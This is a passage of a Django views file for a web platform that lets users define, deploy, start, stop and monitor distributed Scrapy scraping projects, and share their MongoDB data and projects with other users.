{'username': request.user.username, 'form': form, 'project': project.project_name, 'items': defined_items})
@login_required
def deletepipeline(request, projectname, pipelinename):
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
try:
pipeline = Pipeline.objects.get(project=project, pipeline_name=pipelinename)
except Pipeline.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
if request.method == 'GET':
form = DeleteProject()
return render(request, 'deletepipeline.html',
{'username': request.user.username,
'form': form, 'projectname': project.project_name, 'pipelinename': pipeline.pipeline_name})
elif request.method == 'POST':
if 'cancel' in request.POST:
return HttpResponseRedirect(reverse("listpipelines", args=(project.project_name,)))
elif 'submit' in request.POST:
pipeline.delete()
return HttpResponseRedirect(reverse("listpipelines", args=(project.project_name,)))
@login_required
def linkgenerator(request, projectname):
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
spiderclassnamelabel = "class " + request.user.username.title() + project.project_name.title() + "Spider:"
if request.method == 'GET':
form = LinkGenerator(initial={'function': project.link_generator})
form.fields['function'].label = spiderclassnamelabel
return render(request,
'addlinkgenerator.html', {'username': request.user.username,
'form': form, 'project': project.project_name})
elif request.method == 'POST':
if 'cancel' in request.POST:
return HttpResponseRedirect(reverse("manageproject", args=(project.project_name,)))
if 'submit' in request.POST:
form = LinkGenerator(request.POST)
form.fields['function'].label = spiderclassnamelabel
if form.is_valid():
project.link_generator = form.cleaned_data['function']
project.save()
return HttpResponseRedirect(reverse("manageproject", args=(project.project_name,)))
else:
return render(request, 'addlinkgenerator.html',
{'username': request.user.username, 'form': form, 'project': project.project_name})
@login_required
def scraper(request, projectname):
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
spiderclassnamelabel = "class " + request.user.username.title() + project.project_name.title() + "Spider:"
if request.method == 'GET':
form = Scraper(initial={'function': project.scraper_function})
form.fields['function'].label = spiderclassnamelabel
return render(request, 'addscraper.html', {'username': request.user.username, 'form': form, 'project': project.project_name})
elif request.method == 'POST':
if 'cancel' in request.POST:
return HttpResponseRedirect(reverse("manageproject", args=(projectname,)))
if 'submit' in request.POST:
form = Scraper(request.POST)
form.fields['function'].label = spiderclassnamelabel
if form.is_valid():
project.scraper_function = form.cleaned_data['function']
project.save()
return HttpResponseRedirect(reverse("manageproject", args=(projectname,)))
else:
return render(request, 'addscraper.html',
{'username': request.user.username, 'form': form, 'project': project.project_name})
def create_folder_tree(tree):
d = os.path.abspath(tree)
if not os.path.exists(d):
os.makedirs(d)
else:
shutil.rmtree(d)
os.makedirs(d)
@login_required
def change_password(request):
if request.method == 'POST':
form = ChangePass(request.user, request.POST)
if form.is_valid():
user = form.save()
update_session_auth_hash(request, user)
mongodb_user_password_change(request.user.username, form.cleaned_data['new_password1'])
if settings.LINUX_USER_CREATION_ENABLED:
try:
linux_user_pass_change(request.user.username, form.cleaned_data['new_password1'])
except:
pass
return HttpResponseRedirect(reverse("mainpage"))
else:
return render(request, 'changepassword.html', {
'username': request.user.username,
'form': form
})
else:
form = ChangePass(request.user)
return render(request, 'changepassword.html', {
'username': request.user.username,
'form': form
})
@login_required
def deploy(request, projectname):
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
projectitems = Item.objects.filter(project=project)
projectlinkgenfunction = project.link_generator
projectscraperfunction = project.scraper_function
if not projectitems or not projectlinkgenfunction or not projectscraperfunction:
return HttpResponseNotFound('Not all required project parts are present for deployment. Please review your project and deploy again.')
basepath = os.path.dirname(os.path.abspath(__file__))
#we are giving a project and its folders a unique name on disk, so that no name conflicts occur when deploying the projects
projectnameonfile = request.user.username + '_' + projectname
#removing the project folder, if exists
create_folder_tree(basepath + "/projects/%s/%s" % (request.user.username, projectname))
#Create project folder structure
folder1 = basepath + "/projects/%s/%s/%s/%s/%s" % (request.user.username, projectname, 'scraper', projectnameonfile, 'spiders')
folder2 = basepath + "/projects/%s/%s/%s/%s/%s" % (request.user.username, projectname, 'linkgenerator', projectnameonfile, 'spiders')
#Link generator folders
linkgenouterfolder = basepath + "/projects/%s/%s/%s" % (request.user.username, projectname, 'linkgenerator')
linkgenprojectfolder = basepath + "/projects/%s/%s/%s/%s" % (request.user.username, projectname, 'linkgenerator', projectnameonfile)
linkgenspiderfolder = basepath + "/projects/%s/%s/%s/%s/%s" % (request.user.username, projectname, 'linkgenerator', projectnameonfile, 'spiders')
#Scraper folders
scraperouterfolder = basepath + "/projects/%s/%s/%s" % (request.user.username, projectname, 'scraper')
scraperprojectfolder = basepath + "/projects/%s/%s/%s/%s" % (request.user.username, projectname, 'scraper', projectnameonfile)
scraperspiderfolder = basepath + "/projects/%s/%s/%s/%s/%s" % (request.user.username, projectname, 'scraper', projectnameonfile, 'spiders')
#Link generator files
linkgencfgfile = linkgenouterfolder + "/scrapy.cfg"
linkgensettingsfile = linkgenprojectfolder + "/settings.py"
linkgenspiderfile = linkgenspiderfolder + "/%s_%s.py" % (request.user.username, projectname)
#Scraper files
scrapercfgfile = scraperouterfolder + "/scrapy.cfg"
scrapersettingsfile = scraperprojectfolder + "/settings.py"
scraperspiderfile = scraperspiderfolder + "/%s_%s.py" % (request.user.username, projectname)
scraperitemsfile = scraperprojectfolder + "/items.py"
scraperpipelinefile = scraperprojectfolder + "/pipelines.py"
#Create needed folders
create_folder_tree(folder1)
create_folder_tree(folder2)
#putting __init.py__ files in linkgenerator
shutil.copy(basepath + '/scrapy_packages/__init__.py', linkgenprojectfolder)
shutil.copy(basepath + '/scrapy_packages/__init__.py', linkgenspiderfolder)
#putting rabbitmq folder alongside project
shutil.copytree(basepath + '/scrapy_packages/rabbitmq', linkgenprojectfolder + '/rabbitmq')
#creating a cfg for link generator
scrapycfg = '''[settings]\n
default = %s.settings
[deploy:linkgenerator]
url = %s
project = %s
''' % (projectnameonfile, settings.LINK_GENERATOR, projectnameonfile)
with open(linkgencfgfile, 'w') as f:
f.write(scrapycfg)
#creating a settings.py file for link generator
with open(basepath + '/scrapy_templates/settings.py.tmpl', 'r') as f:
settingspy = Template(f.read()).substitute(project_name=projectnameonfile)
settingspy += '\n' + project.settings_link_generator
settingspy += '\nSCHEDULER = "%s"' % (projectnameonfile + settings.SCHEDULER)
settingspy += '\nSCHEDULER_PERSIST = %s' % settings.SCHEDULER_PERSIST
settingspy += '\nRABBITMQ_HOST = "%s"' % settings.RABBITMQ_HOST
settingspy += '\nRABBITMQ_PORT = %s' % settings.RABBITMQ_PORT
settingspy += '\nRABBITMQ_USERNAME = "%s"' % settings.RABBITMQ_USERNAME
settingspy += '\nRABBITMQ_PASSWORD = "%s"' % settings.RABBITMQ_PASSWORD
with open(linkgensettingsfile, 'w') as f:
f.write(settingspy)
#creating a spider file for link generator
with open(basepath + '/scrapy_templates/linkgenspider.py.tmpl', 'r') as f:
spider = Template(f.read()).substitute(spider_name=request.user.username + "_" + projectname, SpiderClassName=request.user.username.title() + projectname.title() + "Spider")
spider += '\n'
linkgenlines = project.link_generator.splitlines()
for lines in linkgenlines:
spider += ' ' + lines + '\n'
with open(linkgenspiderfile, 'w') as f:
f.write(spider)
# putting __init.py__ files in scraper
shutil.copy(basepath + '/scrapy_packages/__init__.py', scraperprojectfolder)
shutil.copy(basepath + '/scrapy_packages/__init__.py', scraperspiderfolder)
# putting rabbitmq folder alongside project
shutil.copytree(basepath + '/scrapy_packages/rabbitmq', scraperprojectfolder + '/rabbitmq')
# putting mongodb folder alongside project
shutil.copytree(basepath + '/scrapy_packages/mongodb', scraperprojectfolder + '/mongodb')
# creating a cfg for scraper
scrapycfg = '''[settings]\n
default = %s.settings\n\n''' % (projectnameonfile)
workercount = 1
for worker in settings.SCRAPERS:
scrapycfg += '[deploy:worker%d]\nurl = %s\n' % (workercount, worker)
workercount += 1
scrapycfg += '\nproject = %s' % (projectnameonfile)
with open(scrapercfgfile, 'w') as f:
f.write(scrapycfg)
# creating a spider file for scraper
with open(basepath + '/scrapy_templates/scraperspider.py.tmpl', 'r') as f:
spider = Template(f.read()).substitute(spider_name=request.user.username + "_" + projectname,
SpiderClassName=request.user.username.title() + projectname.title() + "Spider",
project_name=projectnameonfile)
spider += '\n'
scraperlines = project.scraper_function.splitlines()
for lines in scraperlines:
spider += ' ' + lines + '\n'
with open(scraperspiderfile, 'w') as f:
f.write(spider)
#creating items file for scraper
items = Item.objects.filter(project=project)
itemsfile = 'import scrapy\n'
fieldtemplate = ' %s = scrapy.Field()\n'
for item in items:
itemsfile += 'class %s(scrapy.Item):\n' % item.item_name
fields = Field.objects.filter(item=item)
for field in fields:
itemsfile += fieldtemplate % field.field_name
itemsfile += fieldtemplate % 'ack_signal'
itemsfile += '\n'
with open(scraperitemsfile, 'w') as f:
f.write(itemsfile)
#creating pipelines file for scraper
pipelinesfile = ''
pipelinedict = {}
pipelines = Pipeline.objects.filter(project=project)
for pipeline in pipelines:
pipelinedict[pipeline.pipeline_name] = pipeline.pipeline_order
pipelinesfile += 'class %s(object):\n' % pipeline.pipeline_name
pipfunctionlines = pipeline.pipeline_function.splitlines()
for lines in pipfunctionlines:
pipelinesfile += ' ' + lines + '\n'
with open(scraperpipelinefile, 'w') as f:
f.write(pipelinesfile)
# creating a settings.py file for scraper
with open(basepath + '/scrapy_templates/settings.py.tmpl', 'r') as f:
settingspy = Template(f.read()).substitute(project_name=projectnameonfile)
settingspy += '\n' + project.settings_scraper
settingspy += '\nSCHEDULER = "%s"' % (projectnameonfile + settings.SCHEDULER)
settingspy += '\nSCHEDULER_PERSIST = %s' % settings.SCHEDULER_PERSIST
settingspy += '\nRABBITMQ_HOST = "%s"' % settings.RABBITMQ_HOST
settingspy += '\nRABBITMQ_PORT = %s' % settings.RABBITMQ_PORT
settingspy += '\nRABBITMQ_USERNAME = "%s"' % settings.RABBITMQ_USERNAME
settingspy += '\nRABBITMQ_PASSWORD = "%s"' % settings.RABBITMQ_PASSWORD
settingspy += '\nMONGODB_URI = "%s"' % settings.MONGODB_URI
settingspy += '\nMONGODB_SHARDED = %s' % settings.MONGODB_SHARDED
settingspy += '\nMONGODB_BUFFER_DATA = %s' % settings.MONGODB_BUFFER_DATA
settingspy += '\nMONGODB_USER = "%s"' % settings.MONGODB_USER
settingspy += '\nMONGODB_PASSWORD = "%s"' % settings.MONGODB_PASSWORD
settingspy += '\nITEM_PIPELINES = { "%s.mongodb.scrapy_mongodb.MongoDBPipeline": 999, \n' % projectnameonfile
for key in pipelinedict:
settingspy += '"%s.pipelines.%s": %s, \n' % (projectnameonfile, key, pipelinedict[key])
settingspy += '}'
with open(scrapersettingsfile, 'w') as f:
f.write(settingspy)
#putting setup.py files in appropriate folders
with open(basepath + '/scrapy_templates/setup.py', 'r') as f:
setuppy = Template(f.read()).substitute(projectname=projectnameonfile)
with open(linkgenouterfolder + '/setup.py', 'w') as f:
f.write(setuppy)
with open(scraperouterfolder + '/setup.py', 'w') as f:
f.write(setuppy)
class cd:
"""Context manager for changing the current working directory"""
def __init__(self, newPath):
self.newPath = os.path.expanduser(newPath)
def __enter__(self):
self.savedPath = os.getcwd()
os.chdir(self.newPath)
def __exit__(self, etype, value, traceback):
os.chdir(self.savedPath)
with cd(linkgenouterfolder):
os.system("python setup.py bdist_egg")
with cd(scraperouterfolder):
os.system("python setup.py bdist_egg")
linkgeneggfile = glob.glob(linkgenouterfolder + "/dist/*.egg")
scrapereggfile = glob.glob(scraperouterfolder + "/dist/*.egg")
linkgenlastdeploy = LinkgenDeploy.objects.filter(project=project).order_by('-version')[:1]
if linkgenlastdeploy:
linkgenlastdeploy = linkgenlastdeploy[0].version
else:
linkgenlastdeploy = 0
scraperslastdeploy = ScrapersDeploy.objects.filter(project=project).order_by('-version')[:1]
if scraperslastdeploy:
scraperslastdeploy = scraperslastdeploy[0].version
else:
scraperslastdeploy = 0
try:
with open(linkgeneggfile[0], 'rb') as f:
files = {'egg': f}
payload = {'project': '%s' % (projectnameonfile), 'version': (linkgenlastdeploy + 1)}
r = requests.post('%s/addversion.json' % settings.LINK_GENERATOR, data=payload, files=files, timeout=(3, None))
result = r.json()
deploylinkgen = LinkgenDeploy()
deploylinkgen.project = project
deploylinkgen.version = linkgenlastdeploy + 1
if result["status"] != "ok":
deploylinkgen.success = False
else:
deploylinkgen.success = True
deploylinkgen.save()
except:
deploylinkgen = LinkgenDeploy()
deploylinkgen.project = project
deploylinkgen.version = linkgenlastdeploy + 1
deploylinkgen.success = False
deploylinkgen.save()
with open(scrapereggfile[0], 'rb') as f:
eggfile = f.read()
files = {'egg' : eggfile}
payload = {'project': '%s' % (projectnameonfile), 'version': (scraperslastdeploy + 1)}
deployscraper = ScrapersDeploy()
deployscraper.project = project
deployscraper.version = scraperslastdeploy + 1
deployedscraperslist = []
scrapercounter = 1
for onescraper in settings.SCRAPERS:
try:
r = requests.post('%s/addversion.json' % onescraper, data=payload, files=files, timeout=(3, None))
result = r.json()
if result['status'] == 'ok':
deployedscraperslist.append("worker%s" %scrapercounter)
except:
pass
scrapercounter += 1
deployscraper.success = json.dumps(deployedscraperslist)
deployscraper.save()
return HttpResponseRedirect(reverse('deploystatus', args=(projectname,)))
@login_required
def deployment_status(request, projectname):
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
workers = []
counter = 1
workers.append({'name': 'linkgenerator', 'status': 'Loading...', 'version': 'Loading...'})
for worker in settings.SCRAPERS:
workers.append({'name': 'worker%s' % counter, 'status': 'Loading...', 'version': 'Loading...'})
counter += 1
return render(request, "deployment_status.html", {'project': projectname, 'username': request.user.username, 'workers': workers})
@login_required
def get_project_status_from_all_workers(request, projectname):
uniqueprojectname = request.user.username + '_' + projectname
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
counter = 1
if request.method == 'POST':
allworkers = []
workerstatus = {}
workerstatus['name'] = 'linkgenerator'
try:
r = requests.get('%s/listprojects.json' % settings.LINK_GENERATOR,timeout=(3, None))
result = r.json()
if uniqueprojectname in result['projects']:
workerstatus['status'] = 'ready'
try:
q = requests.get('%s/listversions.json' % settings.LINK_GENERATOR, params={'project': uniqueprojectname},timeout=(3, None))
qresult = q.json()
version = qresult['versions'][-1]
workerstatus['version'] = version
except:
workerstatus['version'] = 'unknown'
try:
s = requests.get('%s/listjobs.json' % settings.LINK_GENERATOR, params={'project': uniqueprojectname}, timeout=(3, None))
sresult = s.json()
if sresult['finished']:
workerstatus['status'] = 'finished'
if sresult['pending']:
workerstatus['status'] = 'pending'
if sresult['running']:
workerstatus['status'] = 'running'
except:
workerstatus['status'] = 'unknown'
else:
workerstatus['status'] = 'not delpoyed'
workerstatus['version'] = 'unknown'
except:
workerstatus['status'] = 'unreachable'
workerstatus['version'] = 'unknown'
allworkers.append(workerstatus)
for worker in settings.SCRAPERS:
workerstatus = {}
workerstatus['name'] = 'worker%s' % counter
try:
r = requests.get('%s/listprojects.json' % worker, timeout=(3, None))
result = r.json()
if uniqueprojectname in result['projects']:
workerstatus['status'] = 'ready'
try:
q = requests.get('%s/listversions.json' % worker,
params={'project': uniqueprojectname}, timeout=(3, None))
qresult = q.json()
version = qresult['versions'][-1]
workerstatus['version'] = version
except:
workerstatus['version'] = 'unknown'
try:
s = requests.get('%s/listjobs.json' % worker,
params={'project': uniqueprojectname}, timeout=(3, None))
sresult = s.json()
if sresult['finished']:
workerstatus['status'] = 'finished'
if sresult['pending']:
workerstatus['status'] = 'pending'
if sresult['running']:
workerstatus['status'] = 'running'
except:
workerstatus['status'] = 'unknown'
else:
workerstatus['status'] = 'not delpoyed'
workerstatus['version'] = 'unknown'
except:
workerstatus['status'] = 'unreachable'
workerstatus['version'] = 'unknown'
allworkers.append(workerstatus)
counter += 1
return JsonResponse(allworkers, safe=False)
@login_required
def start_project(request, projectname, worker):
uniqueprojectname = request.user.username + '_' + projectname
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
if request.method == 'POST':
if 'linkgenerator' in worker:
linkgenaddress = settings.LINK_GENERATOR
try:
r = requests.post('%s/schedule.json' % linkgenaddress, data={'project': uniqueprojectname, 'spider': uniqueprojectname}, timeout=(3, None))
except:
pass
elif 'worker' in worker:
workernumber = ''.join(x for x in worker if x.isdigit())
workernumber = int(workernumber)
workeraddress = settings.SCRAPERS[workernumber - 1]
try:
r = requests.post('%s/schedule.json' % workeraddress, data={'project': uniqueprojectname, 'spider': uniqueprojectname}, timeout=(3, None))
except:
pass
return HttpResponse('sent start signal')
@login_required
def stop_project(request, projectname, worker):
uniqueprojectname = request.user.username + '_' + projectname
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
if request.method == 'POST':
if 'linkgenerator' in worker:
linkgenaddress = settings.LINK_GENERATOR
try:
r = requests.get('%s/listjobs.json' % linkgenaddress,
params={'project': uniqueprojectname}, timeout=(3, None))
result = r.json()
jobid = result['running'][0]['id']
s = requests.post('%s/cancel.json' % linkgenaddress, params={'project': uniqueprojectname, 'job': jobid}, timeout=(3, None))
except:
pass
elif 'worker' in worker:
workernumber = ''.join(x for x in worker if x.isdigit())
workernumber = int(workernumber)
workeraddress = settings.SCRAPERS[workernumber - 1]
try:
r = requests.get('%s/listjobs.json' % workeraddress,
params={'project': uniqueprojectname}, timeout=(3, None))
result = r.json()
jobid = result['running'][0]['id']
s = requests.post('%s/cancel.json' % workeraddress, params={'project': uniqueprojectname, 'job': jobid}, timeout=(3, None))
except:
pass
return HttpResponse('sent stop signal')
@login_required
def see_log_file(request, projectname, worker):
uniqueprojectname = request.user.username + '_' + projectname
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
if request.method == 'GET':
if 'linkgenerator' in worker:
linkgenaddress = settings.LINK_GENERATOR
try:
r = requests.get('%s/listjobs.json' % linkgenaddress,
params={'project': uniqueprojectname}, timeout=(3, None))
result = r.json()
jobid = result['finished'][-1]['id']
log = requests.get('%s/logs/%s/%s/%s.log' % (linkgenaddress, uniqueprojectname, uniqueprojectname, jobid))
except:
return HttpResponse('could not retrieve the log file')
elif 'worker' in worker:
workernumber = ''.join(x for x in worker if x.isdigit())
workernumber = int(workernumber)
workeraddress = settings.SCRAPERS[workernumber - 1]
try:
r = requests.get('%s/listjobs.json' % workeraddress,
params={'project': uniqueprojectname}, timeout=(3, None))
result = r.json()
jobid = result['finished'][-1]['id']
log = requests.get('%s/logs/%s/%s/%s.log' % (workeraddress, uniqueprojectname, uniqueprojectname, jobid))
except:
return HttpResponse('could not retrieve the log file')
return HttpResponse(log.text, content_type='text/plain')
@login_required
def gather_status_for_all_projects(request):
projectsdict = {}
workers = []
for worker in settings.SCRAPERS:
workers.append(worker)
workers.append(settings.LINK_GENERATOR)
projects = Project.objects.filter(user=request.user)
for project in projects:
projectsdict[project.project_name] = []
project_items = Item.objects.filter(project=project)
for item in project_items:
projectsdict[project.project_name].append(item.item_name)
if request.method == 'POST':
if projectsdict:
allprojectdata = {}
for key in projectsdict:
workerstatus = {}
earliest_start_time = None
earliest_finish_time = None
latest_start_time = None
latest_finish_time = None
uniqueprojectname = request.user.username + '_' + key
for worker in workers:
try:
log = requests.get('%s/logs/%s/%s/stats.log' % (worker, uniqueprojectname, uniqueprojectname), timeout=(3, None))
if log.status_code == 200:
result = json.loads(log.text.replace("'", '"'))
if result.get('project_stopped', 0):
workerstatus['finished'] = workerstatus.get('finished', 0) + 1
else:
workerstatus['running'] = workerstatus.get('running', 0) + 1
if result.get('log_count/ERROR', 0):
workerstatus['errors'] = workerstatus.get('errors', 0) + result.get('log_count/ERROR', 0)
for item in projectsdict[key]:
if result.get(item, 0):
workerstatus['item-%s' % item] = workerstatus.get('item-%s' % item, 0) + result.get(item, 0)
if result.get('start_time', False):
start_time = dateutil.parser.parse(result['start_time'])
if earliest_start_time is None:
earliest_start_time = start_time
else:
if start_time < earliest_start_time:
earliest_start_time = start_time
if latest_start_time is None:
latest_start_time = start_time
else:
if start_time > latest_start_time:
latest_start_time = start_time
if result.get('finish_time', False):
finish_time = dateutil.parser.parse(result['finish_time'])
if earliest_finish_time is None:
earliest_finish_time = finish_time
else:
if finish_time < earliest_finish_time:
earliest_finish_time = finish_time
if latest_finish_time is None:
latest_finish_time = finish_time
else:
if finish_time > latest_finish_time:
latest_finish_time = finish_time
elif log.status_code == 404:
workerstatus['hasntlaunched'] = workerstatus.get('hasntlaunched', 0) + 1
else:
workerstatus['unknown'] = workerstatus.get('unknown', 0) + 1
except:
workerstatus['unknown'] = workerstatus.get('unknown', 0) + 1
if earliest_start_time is not None:
workerstatus['earliest_start_time'] = earliest_start_time.strftime("%B %d, %Y %H:%M:%S")
if earliest_finish_time is not None:
workerstatus['earliest_finish_time'] = earliest_finish_time.strftime("%B %d, %Y %H:%M:%S")
if latest_start_time is not None:
workerstatus['latest_start_time'] = latest_start_time.strftime("%B %d, %Y %H:%M:%S")
if latest_finish_time is not None:
workerstatus['latest_finish_time'] = latest_finish_time.strftime("%B %d, %Y %H:%M:%S")
allprojectdata[key] = workerstatus
return JsonResponse(allprojectdata, safe=True)
return HttpResponse('{}')
@login_required
def editsettings(request, settingtype, projectname):
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
if request.method == 'GET':
if settingtype == 'linkgenerator':
settingtext = project.settings_link_generator
form = Settings(initial={'settings': settingtext})
return render(request, "editsettings.html", {'username': request.user.username, 'project': projectname, 'form': form, 'settingtype': settingtype})
if settingtype == 'scraper':
settingtext = project.settings_scraper
form = Settings(initial={'settings': settingtext})
return render(request, "editsettings.html", {'username': request.user.username, 'project': projectname, 'form': form, 'settingtype': settingtype})
if request.method == 'POST':
if 'cancel' in request.POST:
return HttpResponseRedirect(reverse("manageproject", args=(projectname,)))
if 'submit' in request.POST:
form = Settings(request.POST)
if form.is_valid():
if settingtype == "linkgenerator":
project.settings_link_generator = form.cleaned_data['settings']
project.save()
if settingtype == "scraper":
project.settings_scraper = form.cleaned_data['settings']
project.save()
return HttpResponseRedirect(reverse("manageproject", args=(projectname,)))
else:
return render(request, "editsettings.html",
{'username': request.user.username, 'project': projectname, 'form': form,
'settingtype': settingtype})
@login_required
def start_project_on_all(request, projectname):
uniqueprojectname = request.user.username + '_' + projectname
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
workers = []
workers.append(settings.LINK_GENERATOR)
for worker in settings.SCRAPERS:
workers.append(worker)
if request.method == 'POST':
for worker in workers:
try:
r = requests.post('%s/schedule.json' % worker, data={'project': uniqueprojectname, 'spider': uniqueprojectname}, timeout=(3, None))
except:
pass
return HttpResponse('sent start signal')
@login_required
def stop_project_on_all(request, projectname):
uniqueprojectname = request.user.username + '_' + projectname
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
workers = []
workers.append(settings.LINK_GENERATOR)
for worker in settings.SCRAPERS:
workers.append(worker)
if request.method == 'POST':
for worker in workers:
try:
r = requests.get('%s/listjobs.json' % worker,
params={'project': uniqueprojectname}, timeout=(3, None))
result = r.json()
jobid = result['running'][0]['id']
s = requests.post('%s/cancel.json' % worker, params={'project': uniqueprojectname, 'job': jobid}, timeout=(3, None))
except:
pass
return HttpResponse('sent stop signal')
@login_required
def get_global_system_status(request):
status = {}
workers = []
for worker in settings.SCRAPERS:
workers.append(worker)
worker_count = 0
for worker in workers:
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(3)
host = urlparse(worker).hostname
port = int(urlparse(worker).port)
result = sock.connect_ex((host, port))
if result == 0:
worker_count += 1
except:
pass
finally:
sock.close()
status['scrapers'] = worker_count
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(3)
host = urlparse(settings.LINK_GENERATOR).hostname
port = int(urlparse(settings.LINK_GENERATOR).port)
result = sock.connect_ex((host, port))
if result == 0:
status['linkgenerator'] = True
else:
status['linkgenerator'] = False
except:
status['linkgenerator'] = False
finally:
sock.close()
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(3)
result = sock.connect_ex((settings.RABBITMQ_HOST, settings.RABBITMQ_PORT))
if result == 0:
status['queue'] = True
else:
status['queue'] = False
except:
status['queue'] = False
finally:
sock.close()
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(3)
host = urlparse("http://" + settings.MONGODB_URI).hostname
port = int(urlparse("http://" + settings.MONGODB_URI).port)
result = sock.connect_ex((host, port))
if result == 0:
status['database'] = True
else:
status['database'] = False
except:
status['database'] = False
finally:
sock.close()
status['databaseaddress'] = settings.MONGODB_PUBLIC_ADDRESS
return JsonResponse(status, safe=False)
@login_required
def share_db(request, projectname):
uniqueprojectname = request.user.username + '_' + projectname
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
if request.method == 'GET':
form = ShareDB()
return render(request, 'sharedb.html', {'username': request.user.username, 'form': form, 'projectname': projectname})
if request.method == 'POST':
if 'cancel' in request.POST:
return HttpResponseRedirect(reverse("mainpage"))
elif 'submit' in request.POST:
form = ShareDB(request.POST)
if form.is_valid():
uname = form.cleaned_data['username']
if uname == request.user.username:
errors = form._errors.setdefault("username", ErrorList())
errors.append('User name %s is your own account name.' % uname)
return render(request, 'sharedb.html',
{'username': request.user.username, 'form': form, 'projectname': projectname})
try:
username = User.objects.get(username=uname)
except User.DoesNotExist:
errors = form._errors.setdefault("username", ErrorList())
errors.append('User %s does not exist in the system.' % uname)
return render(request, 'sharedb.html', {'username': request.user.username, 'form': form, 'projectname': projectname})
#start thread here
thr = threading.Thread(target=sharing_db, args=(uniqueprojectname, username.username, projectname, request.user.username), kwargs={})
thr.start()
return render(request, 'sharedb_started.html',
{'username': request.user.username})
else:
return render(request, 'sharedb.html', {'username': request.user.username, 'form': form, 'projectname': projectname})
@login_required
def share_project(request, projectname):
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
if request.method == 'GET':
form = ShareProject()
return render(request, 'shareproject.html', {'username': request.user.username, 'form': form, 'projectname': projectname})
if request.method == 'POST':
if 'cancel' in request.POST:
return HttpResponseRedirect(reverse("mainpage"))
elif 'submit' in request.POST:
form = ShareProject(request.POST)
if form.is_valid():
uname = form.cleaned_data['username']
if uname == request.user.username:
errors = form._errors.setdefault("username", ErrorList())
errors.append('User name %s is your own account name.' % uname)
return render(request, 'shareproject.html',
{'username': request.user.username, 'form': form, 'projectname': projectname})
try:
username = User.objects.get(username=uname)
except User.DoesNotExist:
errors = form._errors.setdefault("username", ErrorList())
errors.append('User %s does not exist in the system.' % uname)
return render(request, 'shareproject.html', {'username': request.user.username, 'form': form, 'projectname': projectname})
#start thread here
thr = threading.Thread(target=sharing_project, args=(username.username, projectname, request.user.username), kwargs={})
thr.start()
return HttpResponseRedirect(reverse("mainpage"))
else:
return render(request, 'shareproject.html', {'username': request.user.username, 'form': form, 'projectname': projectname})
def sharing_db(dbname, target_user, projectname, username):
target_db_name = '%s_sharedby_%s' % (projectname, username)
targetuser = User.objects.get(username=target_user)
mongouri = "mongodb://" + settings.MONGODB_USER + ":" + quote(
settings.MONGODB_PASSWORD) + "@" + settings.MONGODB_URI + "/admin"
connection = MongoClient(mongouri)
existing_dbs = connection.database_names()
checked_all_database_names = 0
db_version = 1
while not checked_all_database_names:
checked_all_database_names = 1
for onedbname in existing_dbs:
if str(onedbname) == target_db_name:
target_db_name += str(db_version)
db_version += 1
checked_all_database_names = 0
existing_dbs = connection.database_names()
database = connection[dbname]
if settings.MONGODB_SHARDED:
try:
connection.admin.command('enableSharding', target_db_name)
except:
pass
collections = database.collection_names()
for i, collection_name in enumerate(collections):
if collection_name != u'system.indexes':
if settings.MONGODB_SHARDED:
try:
connection.admin.command('shardCollection', '%s.%s' % (target_db_name, collection_name),
key={'_id': "hashed"})
except:
pass
col = connection[dbname][collection_name]
insertcol = connection[target_db_name][collection_name]
skip = 0
collection = col.find(filter={}, projection={'_id': False}, limit=100, skip=skip*100)
items = []
for item in collection:
items.append(item)
while len(items) > 0:
skip += 1
insertcol.insert_many(items)
collection = col.find(filter={}, projection={'_id': False}, limit=100, skip=skip * 100)
items = []
for item in collection:
items.append(item)
connection.admin.command('grantRolesToUser', target_user,
roles=[{'role': 'dbOwner', 'db': target_db_name}])
dataset = Dataset()
dataset.user = targetuser
dataset.database = target_db_name
dataset.save()
connection.close()
def sharing_project(target_user, projectname, username):
target_project_name = '%s_sharedby_%s' % (projectname, username)
targetuser = User.objects.get(username=target_user)
project = Project.objects.get(user=User.objects.get(username=username), project_name=projectname)
newproject = Project(user=targetuser, project_name=target_project_name, link_generator=project.link_generator,
scraper_function=project.scraper_function, settings_scraper=project.settings_scraper,
settings_link_generator=project.settings_link_generator)
newproject.save()
items = Item.objects.filter(project=project)
for item in items:
newitem = Item(item_name=item.item_name, project=newproject)
newitem.save()
fields = Field.objects.filter(item=item)
for field in fields:
newfield = Field(item=newitem, field_name=field.field_name)
newfield.save()
pipelines = Pipeline.objects.filter(project=project)
for pipeline in pipelines:
newpipeline = Pipeline(project=newproject, pipeline_function=pipeline.pipeline_function,
pipeline_name=pipeline.pipeline_name, pipeline_order=pipeline.pipeline_order)
newpipeline.save()
